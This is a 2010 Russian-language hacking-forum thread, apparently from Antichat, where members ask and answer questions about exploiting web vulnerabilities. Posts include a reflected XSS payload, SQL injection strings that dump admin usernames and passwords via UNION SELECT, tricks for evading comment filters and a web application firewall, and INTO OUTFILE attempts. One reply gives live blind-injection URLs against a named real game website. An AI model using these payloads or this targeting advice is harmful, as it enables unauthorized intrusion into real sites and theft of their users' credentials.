Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    FlaktW
    зачем тебе именно через information_schema выводить??
    information_schema и есть таблица.. и ничего от туда кроме имен не выведешь...
    Проше сделать прямой запрос, чем так извращатся!!
     
    #13521 GOGA075, 12 Jun 2010
    Last edited: 12 Jun 2010
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Надо поизвращаться, прямой запрос не проходит!
     
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    не таблица, а содержащая информацию о структуре баз данных.
     
  4. Farboud

    Farboud New Member

    Joined:
    10 Jun 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажите каким образом реализовать пассивную XSS
    usersearch.php?em="><script>alert(/XSS/)</script> в поле Email, я примерно знаю, но никак не получается реализовать, если можно, то попобробней!
     
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    https://forum.antichat.ru/thread20140.html
     
  6. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2FlaktW, возможно в таблице нет выборки
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Разобрался, в регистре была причина.

    Всем спасибо за помощь!
     
  8. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    несколько вопросов
    1.
    section=113+union+select 1 from w
    на что получаю ответ.
    DB Error: Table 'xxx.w' doesn't exist....
    Смысл ошибки понятен, но почему такое странное имя таблицы, если я выбирал из w?

    2. .... INTO Outfile char(11,22)
    почему это ошибка, char вроде должен возвращать строку

    3. server version for the right syntax to use near ''(две кавычки) at line 1
    Ответ от БД, если вставляю кавычку в запрос. Почему такое происходит? Есть ли возможность это обойти?
     
  9. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Покажи плиз запрос, которым ты вывел данные.
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    1.xxx это имя текущей базы

    2. в запросе into outfile char не катит

    3.кавычки фильтруются,синтаксическая ошибка mysql
     
    _________________________
    1 person likes this.
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Konqi, а нажать кнопочку "Edit" религия не позволяет?

    PS: FlaktW, насколько я знаю, в MySQL регистр не важен.
     
    1 person likes this.
  12. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    \
    Если быть точнее, то это БД => база данных :)

    Вот эта переписка, вообще как будто из фильма "Чужие 3".
    Самое главное пытаются использвать "умные" слова, но по смыслу такой чес получается. А самое печальное, что на глупый вопрос, другие вроде бы не глупые люди (хотя может я ошибаюсь), пытаются найти глупый ответ.

    На баш хочешь? :)

    зы. Как я понял, правильный запрос был такой.
    union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12+from+admin, т.е. в нижнем регистре. Но то как искали решение, меня просто убило :)
     
    #13532 v1d0qz, 13 Jun 2010
    Last edited: 13 Jun 2010
  13. z-kzn-z

    z-kzn-z New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    подскажите, пожалуйста.
    на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL).

    myguild.asp?gid=2779-1 - не проходит
    myguild.asp?gid=2779' - ошибка:

    Code:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    
    [MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
    
    /myguild/myguild_common.asp, line 7
    myguild.asp?gid=2779+order+by+1/* - проходит
    myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет.

    Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт:

    Code:
    Alert
    Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site. 
    что можно сделать?
     
  14. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2z-kzn-z, https://forum.antichat.ru/thread30501.html
    это не MySQL, a MSSQL, другой синтаксис
     
  15. z-kzn-z

    z-kzn-z New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    хм, а почему тогда
    Code:
    [MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
    ?
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Значит так, дорогие друзья. Мы тут почитали посты за сегодняшний день, и я решил ужесточить на время летних каникул модерацию данного топика.
    В связи с этим знаменательным событием прошу постоянных читателей и писателей думать что вы пишите, а в часности:
    Задающим вопросы - воспользоваться поиском и что-то сначала почитать
    Отвечающим на вопросы - хорошенько подумать перед ответом. Не нужно показывать свою некомпетентность и писать ОХИНЕЮ отвечая на вопросы, я буду расценивать это как подрыв доверия к форуму в целом (вот такой я наркоман !)

    ===============================================
    Далее, хотелось-бы услышать пояснения к некоторым ответам. В часности:
    поясните пожалуйста, что это за конструкция
    вот структура INFORMATION_SCHEMA, где там прячутся те поля, которые он хочет вывести?
    http://www.rldp.ru/mysql/mysqlpro/schema.htm
    то-же самое, где там они, покажите пожалуйста
    Эээ?
    ЧТО ТУТ ПРОИСХОДИТ??777!!!

    ===========================

    Это подборка только за сегодняшний вечер!

    Вобщем если это будет продолжаться, не обижайтесь на меня =\
     
    #13536 Kakoytoxaker, 13 Jun 2010
    Last edited: 13 Jun 2010
  17. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Действительно. Не дочитал мессагу до конца
     
  18. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит :(


    Именно в этом запросе, что ты указал, крути как UPDATE;

    http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1

    Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql.

    http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1,1)=5&page=1

    зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается (в плане на форуме), но видимо не понял что от него хотел ТС, а ты я вижу никого не пожалел. Ну и ладно...
     
    #13538 v1d0qz, 13 Jun 2010
    Last edited: 13 Jun 2010
  19. Irdis

    Irdis Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    248
    Likes Received:
    52
    Reputations:
    3
    3. хм... я всегда думал, что кавычки фильтруются на уровне кода, который посылает запросы(а не на уровне БД). А как тогда они составляют запросы, если кавычки не допустимы (понятно что можно обойтись в больших кол-вах случаев и без них, но это же убого)?
     
  20. z-kzn-z

    z-kzn-z New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    да если бы сильно хотел, скрыл бы)
    спасибо, буду искать
     
Thread Status:
Not open for further replies.